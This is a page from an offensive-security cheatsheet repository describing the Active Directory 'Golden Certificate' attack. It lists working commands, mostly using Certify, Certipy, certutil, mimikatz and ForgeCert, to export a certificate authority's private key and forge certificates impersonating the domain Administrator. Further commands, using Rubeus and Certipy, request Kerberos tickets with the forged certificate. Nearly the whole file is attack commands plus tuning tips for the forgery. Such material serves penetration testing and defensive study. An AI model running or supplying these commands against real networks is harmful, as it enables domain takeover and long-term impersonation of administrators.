daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

ad-adcs-golden-certificate.md (4549B)


      1 ---
      2 title: "Active Directory - Golden Certificate"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/ad-adcs-golden-certificate.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/ad-adcs-golden-certificate.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Active Directory - Golden Certificate
     12 
     13 A Golden Certificate is a maliciously crafted certificate that an attacker generates using the CA’s private key.
     14 
     15 ## Obtain CA certificate
     16 
     17 Export the CA certificate including the private key:
     18 
     19 * [GhostPack/Certify](https://github.com/GhostPack/Certify)
     20 
     21     ```ps1
     22     Certify.exe manage-self --dump-certs
     23     ```
     24 
     25 * [ly4k/Certipy](https://github.com/ly4k/Certipy)
     26 
     27     ```ps1
     28     certipy ca -u 'administrator@corp.local' -p 'Passw0rd!' -ns '10.10.10.10' -target 'CA.CORP.LOCAL' -config 'CA.CORP.LOCAL\CORP-CA' -backup
     29     ```
     30 
     31 * [windows-gui/certsrv.msc](https://learn.microsoft.com/en-us/system-center/scom/obtain-certificate-windows-server-and-operations-manager)
     32     * Open `certsrv.msc`
     33     * Right click the CA -> `All Tasks` -> `Back up CA...`
     34     * Follow the wizard but make sure to check `Private key and CA certificate`
     35 
     36 * [windows-gui/certlm.msc](https://learn.microsoft.com/en-us/windows-server/identity/ad-cs/export-certificate-private-key)
     37     * Open `certlm.msc`
     38     * Go to `Personal` -> `Certificates`
     39     * Right click the CA signing certificate -> `All Tasks` -> `Export`
     40     * Follow the wizard but make sure to choose `Yes, export the private key`
     41 
     42 * [windows-commands/certutil](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil)
     43 
     44     ```ps1
     45     certutil -backupKey -f -p SuperSecurePassw0rd! C:\Windows\Tasks\CaBackupFolder
     46     ```
     47 
     48 * [gentilkiwi/mimikatz](https://github.com/gentilkiwi/mimikatz)
     49 
     50     ```ps1
     51     mimikatz.exe "crypto::capi" "crypto::cng" "crypto::certificates /export"
     52     ```
     53 
     54 ## Forge Golden Certificates
     55 
     56 Forge a certificate of a target principal:
     57 
     58 * [GhostPack/Certify](https://github.com/GhostPack/Certify)
     59 
     60     ```ps1
     61     Certify.exe forge --ca-cert <pfx-path/base64-pfx> --upn Administrator --sid S-1-5-21-976219687-1556195986-4104514715-500
     62     ```
     63 
     64 * [GhostPack/ForgeCert](https://github.com/GhostPack/ForgeCert)
     65 
     66     ```ps1
     67     ForgeCert.exe --CaCertPath "ca.pfx" --CaCertPassword "Password" --Subject "CN=User" --SubjectAltName "administrator@domain.local" --NewCertPath "administrator.pfx" --NewCertPassword "Password"
     68     ```
     69 
     70 * [ly4k/Certipy](https://github.com/ly4k/Certipy)
     71 
     72     ```ps1
     73     certipy forge -ca-pfx 'CORP-CA.pfx' -upn 'administrator@corp.local' -sid 'S-1-5-21-...-500' -crl 'ldap:///'
     74 
     75     certipy forge -template 'attacker.pfx' -ca-pfx 'CORP-CA.pfx' -upn 'administrator@corp.local' -sid 'S-1-5-21-...-500'
     76     ```
     77 
     78 :warning: Useful parameters when generating a golden certificate.
     79 
     80 * `-crl`: If the `-crl` option is omitted when forging, authentication might fail. While the KDC doesn't typically perform an active CRL lookup during initial TGT issuance for performance reasons, it does often check for the presence of a CDP extension in the certificate. Its absence can lead to a `KDC_ERROR_CLIENT_NOT_TRUSTED` error.
     81 * `-template 'attacker.pfx'`: Certipy will copy extensions (like Key Usage, basic constraints, AIA, etc.) from attacker.pfx into the new forged certificate, while still setting the **subject**, **UPN**, and *SID* as specified.
     82 * `-subject "CN=xyz-CA-1, DC=xyz, DC=htb"`: set the **Distinguished Name** for the certificate
     83 
     84 ## Request a TGT
     85 
     86 * [GhostPack/Rubeus](https://github.com/GhostPack/Rubeus)
     87 
     88     ```ps1
     89     Rubeus.exe asktgt /user:Administrator /domain:dumpster.fire /certificate:<pfx-path/base64-pfx>
     90     ```
     91 
     92 * [ly4k/Certipy](https://github.com/ly4k/Certipy)
     93 
     94     ```ps1
     95     certipy auth -pfx 'administrator_forged.pfx' -dc-ip '10.10.10.10'
     96     ```
     97 
     98 ## References
     99 
    100 * [BloodHound - GoldenCert Edge - SpecterOps - April 20, 2025](https://bloodhound.specterops.io/resources/edges/golden-cert)
    101 * [Certificate authority - The Hacker Recipes - July 16,2025](https://www.thehacker.recipes/ad/persistence/adcs/certificate-authority)
    102 * [Domain Persistence Techniques - Valdemar Carøe - August 6, 2025](https://github.com/GhostPack/Certify/wiki/3-‐-Domain-Persistence-Techniques)
    103 * [Post‐Exploitation - Oliver Lyak - May 15, 2025](https://github.com/ly4k/Certipy/wiki/07-‐-Post‐Exploitation)
    104 * [Steal or Forge Authentication Certificates - MITRE ATT&CK - April 15, 2025](https://attack.mitre.org/techniques/T1649/)